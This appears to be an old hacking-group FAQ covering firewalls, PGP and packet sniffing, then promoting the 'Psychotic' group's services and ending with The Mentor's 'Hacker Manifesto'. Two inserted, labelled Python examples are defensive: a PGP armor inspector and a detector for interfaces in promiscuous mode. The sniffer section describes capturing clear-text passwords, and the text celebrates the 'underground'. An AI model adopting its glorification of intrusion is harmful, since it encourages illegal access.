Q. What is a firewall?

A. A firewall is a system or group of systems that enforces an access control policy between two networks. The actual means by which this is accomplished varies widely, but in principle, the firewall can be thought of as a pair of mechanisms: one which exists to block traffic, and the other which exists to permit traffic. Some firewalls place a greater emphasis on blocking traffic, while others emphasize permitting traffic. Probably the most important thing to recognize about a firewall is that it implements an access control policy. If you don't have a good idea what kind of access you want to permit or deny, or you simply permit someone or some product to configure a
firewall based on what they or it think it should do, then they are making policy for your organization as a whole.


Q. How can I use PGP to benefit me?

A. PGP is easy to use, but it does give you enough rope to hang yourself. You should
become thoroughly familiar with the various options in PGP before using it to send serious
messages. For example, the command pgp -sat <filename> will only sign a message; it
will not encrypt it. Even though the output looks like it is encrypted, it really isn't. Anybody in the
world would be able to recover the original text.
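
To see why armored output is not the same as encrypted output, here is an added example (not part of the original FAQ and not PGP's own code) that reads the OpenPGP packet tags inside an ASCII-armored block and recovers the text when no encryption packet is present. It handles only old-format packet headers and ZIP compression; the sample message, its placeholder signature bytes and all function names are constructed for illustration.

```python
import base64
import zlib

ENCRYPTED_TAGS = {1, 3, 9, 18}   # RFC 4880: session-key and encrypted-data packets

def armor(raw):
    b64 = base64.b64encode(raw).decode()
    return "-----BEGIN PGP MESSAGE-----\n\n" + b64 + "\n-----END PGP MESSAGE-----\n"

def dearmor(text):
    """Return the raw packet bytes inside an ASCII-armored block."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    body = lines[lines.index("") + 1:-1]          # armor headers end at the blank line
    return base64.b64decode("".join(ln for ln in body if not ln.startswith("=")))

def packets(data):
    """Yield (tag, body) per packet; old-format headers only."""
    i = 0
    while i < len(data):
        hdr, i = data[i], i + 1
        if not hdr & 0x80 or hdr & 0x40:
            raise ValueError("not an old-format OpenPGP packet header")
        tag, ltype = (hdr >> 2) & 0x0F, hdr & 3
        size = (1, 2, 4, 0)[ltype]                # length type 3 = runs to end of data
        n = int.from_bytes(data[i:i + size], "big") if size else len(data) - i
        i += size
        yield tag, data[i:i + n]
        i += n

def inspect(data):
    """Return ('encrypted', None) or ('readable', recovered plaintext bytes)."""
    for tag, body in packets(data):
        if tag in ENCRYPTED_TAGS:
            return "encrypted", None
        if tag == 8:                              # compressed data; algo 1 = raw deflate
            if body[0] != 1:
                raise ValueError("only ZIP compression handled in this example")
            return inspect(zlib.decompress(body[1:], -15))
        if tag == 11:                             # literal: format, name len, name, date, text
            return "readable", body[6 + body[1]:]
    return "readable", b""                        # e.g. a detached signature only

def old_pkt(tag, body):
    """Build an old-format packet with a two-byte length (for the sample below)."""
    return bytes([0x80 | (tag << 2) | 1]) + len(body).to_bytes(2, "big") + body

def signed_only_sample(text):
    """Constructed stand-in for a signed, compressed, unencrypted message."""
    inner = old_pkt(2, b"\x00" * 8) + old_pkt(11, b"t\x00" + b"\x00" * 4 + text)
    z = zlib.compressobj(9, zlib.DEFLATED, -15)
    return armor(old_pkt(8, b"\x01" + z.compress(inner) + z.flush()))
```

Calling inspect(dearmor(signed_only_sample(b"meet at noon"))) returns the original bytes without any key, which is the check to run on a message before trusting that it was encrypted.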

Q. What is a sniffer?

A. Taken from the Sniffer FAQ.
Unlike telephone circuits, computer networks are shared communication channels. It is simply too expensive to dedicate local loops to the switch (hub) for each pair of communicating computers. Sharing means that computers can receive information that was intended for other machines. To capture the information going over the network is called sniffing.

The most popular way of connecting computers is through ethernet. Ethernet protocol works by sending packet information to all the hosts on the same circuit. The packet header contains the proper address of the destination machine. Only the machine with the matching address is supposed to accept the packet. A machine that is accepting all packets, no matter what the packet header says, is said to be in promiscuous mode.

Because, in a normal networking environment, account and password information is passed along
ethernet in clear-text, it is not hard for an intruder once they obtain root to put a machine into
promiscuous mode and by sniffing, compromise all the machines on the net.
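
On the defensive side, a host that has been switched into promiscuous mode usually leaves a trace in its kernel log. The following added example (not from the Sniffer FAQ or the original page) replays log lines and reports interfaces that entered promiscuous mode, never left it, and are not on an allowlist. The log lines are constructed, modeled on the Linux kernel's "entered promiscuous mode" message, and the function name and allowlist are assumptions.

```python
import re

# Accepts "device eth0 entered promiscuous mode" and "eth0: entered promiscuous mode".
PROMISC_RE = re.compile(
    r"(?:device\s+)?(?P<ifname>[\w.-]+):?\s+(?P<verb>entered|left) promiscuous mode"
)

# Constructed sample log lines (hostnames, times and interfaces are made up).
SAMPLE_LOG = [
    "Mar  3 02:14:07 host1 kernel: device eth0 entered promiscuous mode",
    "Mar  3 02:14:09 host1 kernel: device br0 entered promiscuous mode",
    "Mar  3 02:20:31 host1 kernel: device eth0 left promiscuous mode",
    "Mar  3 02:41:10 host1 sshd[812]: Accepted password for root from 10.0.0.5",
    "Mar  3 03:02:55 host1 kernel: eth1: entered promiscuous mode",
]


def unexpected_promiscuous(log_lines, expected=()):
    """Return {ifname: line_number} for interfaces still promiscuous at end of log.

    `expected` lists interfaces that are legitimately promiscuous
    (bridges, IDS sensor ports) and should not be reported.
    """
    active = {}
    for lineno, line in enumerate(log_lines, 1):
        match = PROMISC_RE.search(line)
        if match is None:
            continue
        ifname = match.group("ifname")
        if match.group("verb") == "entered":
            # Keep the first line where it entered; later repeats add nothing.
            active.setdefault(ifname, lineno)
        else:
            active.pop(ifname, None)
    return {name: n for name, n in active.items() if name not in set(expected)}


if __name__ == "__main__":
    for name, n in unexpected_promiscuous(SAMPLE_LOG, expected={"br0"}).items():
        print(f"{name}: promiscuous since log line {n}: {SAMPLE_LOG[n - 1]}")
```

A short-lived capture such as eth0 above is not reported by this function; keep the enter and leave events themselves if brief sniffing sessions also matter to you.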


Q. What is Psychotic?

A. I would describe Psychotic as more of a professional group rather than just a hacking clan. We think about money first and hacking second, even though I'm sure that most of you have seen a few of our hacking projects...

Q. Is psychotic looking for new members?

A. Well as of now we aren't looking for any additions to our staff, but stay posted we might decide that we need new members.

Q. What is Psychosis?

A. Psychosis is a personal project taken up by Virtual Circuit. It's an award that he gives out to hackers that have done something to stand out (good webpage, revealed exploits, etc.). If you think that you should receive the award you can mail him about it. But I can tell you now that the award isn't easy to get.

Q. What is the "Devil's Gateway?"

A. The "Devil's Gateway" is a personal project taken up by VooDooHex. It's kind of like an information retrieval guild, but yet it's still like a group. If you are interested in joining the Devil's Gateway you should mail VooDoo about it.

Q. Where can I find some good resources on hacking and phreaking?

A. Well we aren't much for links but you should check the Psychosis page for his webpage award winners. He picks only the best.

Q. Who are all the members in Psychotic?

A. We would like to stay anonymous. But you will see a member's name every now and then.

Q. What are Psychotic's offered services?

A. Psychotic has many different services, security testing, webpage design, graphic design, sponsoring, pop accounts, and webpage hosting. Each service has a different price. You can read more about our services on the services section of the page.


This is only the first copy of our FAQ. We will be updating and adding information and questions to it as often as possible. I would appreciate it if you would distribute and spread this text as much as you can. We don't want people asking us these questions anymore. Have fun and keep the underground alive.


Another one got caught today, it's all over the papers. "Teenager Arrested in Computer
Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids. They're all
alike. But did you, in your three-piece psychology and 1950's technobrain, ever take a
look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces
shaped him, what may have molded him? I am a hacker, enter my world... Mine is a world
that begins with school... I'm smarter than most of the other kids, this crap they teach us
bores me... Damn underachiever. They're all alike. I'm in junior high or high school. I've
listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it.
"No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied
it. They're all alike. I made a discovery today. I found a computer. Wait a second, this is
cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not
because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or
doesn't like teaching and shouldn't be here... Damn kid. All he does is play games. They're
all alike. And then it happened... a door opened to a world... rushing through the phone line
like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the
day-to-day incompetencies is sought... a board is found. "This is it... this is where I
belong..." I know everyone here... even if I've never met them, never talked to them, may
never hear from them again... I know you all... Damn kid. Tying up the phone line again.
They're all alike... You bet your ass we're all alike... we've been spoon-fed baby food at
school when we hungered for steak... the bits of meat that you did let slip through were
pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic.
The few that had something to teach found us willing pupils, but those few are like drops of
water in the desert. This is our world now... the world of the electron and the switch, the
beauty of the baud. We make use of a service already existing without paying for what
could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We
explore... and you call us criminals. We seek after knowledge... and you call us criminals.
We exist without skin color, without nationality, without religious bias... and you call us
criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try
to make us believe it's for our own good, yet we're the criminals. Yes, I am a criminal. My
crime is that of curiosity. My crime is that of judging people by what they say and think,
not what they look like. My crime is that of outsmarting you, something that you will never
forgive me for. I am a hacker, and this is my manifesto. You may stop this individual, but
you can't stop us all... after all, we're all alike.

+++The Mentor+++

 
